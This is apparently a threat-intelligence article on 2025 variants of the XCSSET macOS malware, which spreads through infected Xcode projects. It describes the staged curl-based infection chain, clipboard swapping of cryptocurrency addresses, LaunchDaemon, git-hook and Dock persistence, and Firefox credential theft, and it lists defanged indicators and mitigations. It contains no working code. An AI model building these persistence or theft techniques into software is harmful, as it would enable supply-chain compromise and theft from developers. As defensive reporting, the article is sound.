Microsoft Threat Intelligence has identified a new variant of the XCSSET macOS malware in limited attacks, marking a significant evolution of a threat first documented in 2020.1 This sophisticated malware, which uniquely targets software developers by infecting Xcode projects, has incorporated several new capabilities, including clipboard hijacking for cryptocurrency theft and a more robust persistence mechanism using a system-level LaunchDaemon.2 The discovery, detailed in reports from March and September 2025, demonstrates the malware’s active development and its increasing risk to the software supply chain.
The continued refinement of XCSSET throughout 2025 represents the first major update to the malware since 2022.7 Its primary infection vector remains the compromise of Xcode projects, which can lead to a wormable spread as developers build and share infected projects. The latest variants show enhanced obfuscation techniques, expanded data theft modules targeting the Firefox browser, and more sophisticated methods to maintain a foothold on compromised systems. This progression underscores a focused effort by threat actors to exploit the trust within developer ecosystems.
Infection Chain and Core Payload
The infection process begins when a developer builds a compromised Xcode project. The initial stage involves a heavily obfuscated shell payload, often decoded through multiple iterations of commands like `xxd` or `base64`. This payload typically executes a `curl` command to fetch the next stage from a Command-and-Control (C2) server. The second stage collects basic system information, such as the macOS version, and sends it back to the C2 to download a subsequent payload. This script performs reconnaissance, checks security software versions, and terminates processes like Terminal and Finder to avoid detection.1
The third stage downloads a core AppleScript payload, often named `/tmp/b` or `looz`, which acts as the malware’s orchestrator. This module collects extensive system data, including System Integrity Protection (SIP) status, firewall settings, and installed browser information, and exfiltrates it to the C2 server. Its primary function is to call a `boot()` method that downloads and executes various sub-modules based on commands received from the attacker’s server, enabling a modular and updatable malicious framework.1
Enhanced Data Theft and Clipboard Hijacking
A key addition in the September 2025 variant is the enhanced `vexyeqj` module, which upgrades the previous info-stealer with clipboard monitoring capabilities. This sub-module, named `bnk`, downloads an encrypted configuration file from the C2 server containing a list of targeted cryptocurrencies like Bitcoin and Ethereum. The configuration includes regular expression patterns to identify specific wallet addresses and a list of attacker-controlled addresses for substitution.2
When a user copies a cryptocurrency address to the clipboard, the malware checks it against the configuration. If the address matches a targeted currency pattern but is not one of the attacker’s addresses, the malware silently replaces the clipboard content with an address from the attacker’s list. This technique can redirect payments intended for a legitimate recipient to the threat actor. The `bnk` payload is delivered as a run-only compiled AppleScript, complicating static analysis, and uses AES encryption for communications with the C2 server.2
New Persistence and Evasion Techniques
The malware’s persistence mechanisms have been expanded beyond the established `zshrc` and Dock methods. The September variant introduces a `LaunchDaemon` persistence module (`xmyyeqjx`). This module uses AppleScript’s `with administrator privileges` command to gain elevated rights and create a system-level daemon plist file. The daemon is configured to execute a payload script that ensures the malware’s main persistence via `.zshrc` remains active and even attempts to disable macOS security updates. The plist often uses a `com.google.` prefix to appear legitimate.2
Other persistence methods detailed in the March 2025 report include a Git-based technique that modifies or creates `pre-commit` hooks in `.git` directories, ensuring execution every time a developer makes a commit. The `Dock` method involves using a tool called `dockutil` to replace the legitimate Launchpad dock entry with a malicious application that runs the payload before launching the real application. These multi-layered persistence strategies increase the malware’s resilience on an infected system.1
Expanded Targeting and Mitigation Strategies
The malware’s data theft capabilities have been broadened to include the Firefox browser through a new module named `iewmilh_cdyd`. This module downloads a modified version of the open-source `HackBrowserData` tool, which is executed to decrypt and export sensitive data from Firefox, including saved passwords, browsing history, and cookies. The data is then archived and sent to the C2 server. This expansion beyond WebKit and Chromium-based browsers demonstrates the actors’ intent to maximize the theft of valuable information.2
To protect against XCSSET, developers should exercise vigilance when working with Xcode projects, especially those cloned from public repositories. Keeping macOS and Xcode updated to the latest versions is critical. Deploying endpoint detection and response solutions can provide specific detections for this activity. For high-value operations like cryptocurrency transactions, manually verifying pasted wallet addresses is recommended. Adhering to the principle of least privilege by avoiding daily use of an administrator account can also limit the malware’s impact.7
Indicators of Compromise and Attribution
The infrastructure associated with XCSSET has also evolved. The March 2025 variant used C2 domains like `bulknames[.]ru` and `gizmodoc[.]ru`, while the September variant has shifted to domains such as `cdntor[.]ru` and `applecdn[.]ru`. File paths associated with the malware include `~/Library/Caches/com.apple.finder/` for a fake Launchpad application and `~/.zshrc_aliases` for a persistence script. Example SHA-256 hashes include `d338dc9a75a14753f57399815b5d996a1c5e65aa4eb203222d8c85fb3d74b02f` for a fourth-stage payload.1, 2
The malware employs a wide range of techniques mapped to the MITRE ATT&CK framework, including Supply Chain Compromise (T1195.001), Execution via AppleScript (T1059.002), and Persistence via Plist File Modification (T1556.003). The continuous development of XCSSET, with its focus on developers and supply chain attacks, highlights a persistent and dangerous threat to the macOS ecosystem that requires ongoing vigilance and layered defensive measures.1, 2
References
- Microsoft Security Blog. (2025, March 11). New XCSSET malware adds new obfuscation, persistence techniques to infect Xcode projects.
- Microsoft Security Blog. (2025, September 25). XCSSET evolves again: Analyzing the latest updates to XCSSET’s inventory.
- Microsoft Threat Intelligence [@MsftSecIntel]. (2025, September 25). Announcement of new XCSSET variant [Post]. X.
- Broadcom Support. (2025, March 18). New XCSSET macOS malware variant discovered.
- The Stack. (2025, February 17). Upgraded macOS malware is targeting Apple developers.
- Microsoft Security Intelligence. (2022, updated 2025). Trojan:MacOS/XCSSET.A threat description.
- Montalbano, E. (2025, February 18). Microsoft: New Variant of macOS Threat XCSSET Spotted in the Wild. Dark Reading.
- Trend Micro. (2020, August). XCSSET Mac Malware – Infects Xcode Projects, Uses 0-Days.
- Nelson, N. (2025, June 19). Iran-Israel War Triggers a Maelstrom in Cyberspace. Dark Reading.
- Microsoft Detects New XCSSET MacOS Malware Variant. (2025, February 17). InfoSecurity Magazine.
